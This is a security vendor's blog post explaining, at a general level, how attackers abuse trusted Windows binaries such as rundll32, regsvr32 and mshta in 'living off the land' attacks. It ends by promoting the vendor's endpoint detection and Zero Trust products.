Living Off the Land: Surviving the Digital Wilderness

Brent Murphy
Aaron Goldstein
August 10, 2023

In recent years, cyber attackers have employed tactics that involve "living off the land" (LOL) within the environments they target. Essentially, malicious actors leverage existing tools within operating systems, hardware, APIs, and SaaS products to make it significantly harder to detect intrusions, data exfiltration, and lateral movement through networks and systems. In this blog, we delve into how attackers utilize legitimate software to bypass security protections and remain undetected.

Learning the landscape

Living Off the Land Binaries and Scripts (LOLBAS) constitutes a family of exploits that abuse binaries (LOLBIN) and drivers (LOLDRIVERS) to execute actions on a device. These actions are contingent upon the exploited tool having a trust relationship with the operating system. While various types of LOLBAS attacks utilize a broad range of procedures to achieve their intended actions, they share similarities in their functions and objectives. Additionally, they execute without leaving files behind but can invoke scripts from remote servers to establish persistence via backdoors or Remote Access Trojans (RATs) and to retrieve host and network information, including privileged data such as credentials.

Once inside a system, LOL attacks utilize locally present drivers to:

  • Execute code
  • Compile code
  • Establish persistence
  • Bypass user account control
  • Perform credential theft
  • Dump process memory
  • Perform surveillance
  • Modify and/or clear logs
  • Side-load malicious DLLs

This creates an ideal environment for an attacker to progress through the network or introduce malware to the environment while bypassing detection, with potentially dire consequences.

Understanding techniques

LOL techniques encompass the misuse of interpreters like Windows Command Shell and PowerShell, infrastructure such as Windows Management Instrumentation, and device/system/application drivers.  These fileless attacks target Microsoft-signed software files crucial for network operations. Exploiting the inherent functions of these interpreters and their trust relationships with the operating system, attackers often exploit these binaries to download external Command and Control (C2) scripts, retrieve local system information, and query internal network systems for privileged user information. By leveraging the trust relationship of these signed files against the native OS, attackers persist and operate on the host and within the network while remaining imperceptible to both endpoint and network detection.

The Windows binaries exploited by attackers serve essential functions in systems, encompassing host management and network communication. As vital components of business operations, these utilities include:

  • rundll32[.]exe - Loads and runs DLLs. Exploited by attackers to execute malicious DLLs.
  • regsvr32[.]exe - Registers and unregisters object linking and embedding controls on Windows systems. Exploited to run arbitrary code, calling malicious scripts from remote servers to execute on the host.
  • mshta[.]exe - Executes Microsoft HTA files. Often distributed via malicious emails, these files are parsed in browsers and can execute malicious vbscript, bypassing application allowlisting.

Utilizing MITRE ATT&CK to track the functions of these LOL attacks permits us to gather preliminary intelligence on the attack's nature, enabling us to plan and respond effectively. The following represent the most common MITRE-assigned techniques from the LOLBAS Project list of known LOL attacks, sorted in descending order by frequency, and listed number of occurrences in the list:

Using these techniques, threat actors can extract and manipulate data from their environment using tools that already exist on networks/hosts in ways unintended by developers. Regardless of whether the attack originates from an interpreter or a driver, they all share a common purpose.

Defending against living off the land techniques

LOL attacks leveraging preexisting critical OS utilities pose challenges for detection and defense. Nonetheless, several methods can be employed to guard against these attacks. An effective Endpoint Detection and Response (EDR) solution monitors and inspects hosts for potentially malicious process invocation resulting from LOLBAS execution. Early detection and prevention are crucial, as they can impede attackers' network movement and rapid malware propagation. Despite their effectiveness, host-level protections like EDR could become a single point of failure if the network relies on assumed trust relationships among devices. These relationships are often targeted by advanced adversaries for lateral movement or malware spreading.

In contrast to many EDR platforms, Todyl's comprehensive approach addresses threats posed by fileless attacks while eliminating that single point of failure. Todyl's Endpoint Security solution employs proactive measures to terminate malicious processes resulting from in-memory attacks before they execute on the host. This incorporates Memory Threat Protection, which performs real-time analysis of command execution to identify indicators of fileless attacks like LOLBAS. It analyzes the context of in-memory command execution to terminate malicious processes, preventing dynamic threats inherent in fileless attacks, often missed by many EDR platforms. Further details on Todyl's process detection and handling can be found here.

While Memory Threat Protection mitigates fileless attack threats, Todyl's SASE platform addresses another critical factor contingent on the success of fileless attacks: trust relationships. Our SASE platform was conceived on the principle of least privilege, anticipating adversarial tactics. Guided by "Never Trust, Always Verify," we manage trust relationships between applications, network-enabled devices, and users. Todyl's Zero Trust Network Access (ZTNA) capabilities via SASE prevent access from unverified devices and offer granular access control at scale. Alternatively, Todyl's LAN Zero Trust provides network segmentation and conditional access to sensitive physical network resources. Zero Trust implementation thwarts LOLBAS attacks by impeding intrusion, limiting lateral movement and malware propagation through network segmentation, and minimizing data leakage risks by providing controlled access to specific resources

Though LOL attacks are on the rise, organizations can employ Todyl to safeguard themselves and their clients from exploitation. Learn more about Todyl's EDR capabilities in preventing LOL and other common attacks like ransomware by reading our eBook.

Stay up to date

Subscribe to receive the latest insights, news, and updates from Todyl.

Additional reading

Todyl updates

Sign-up to get the latest from Todyl sent straight to your inbox.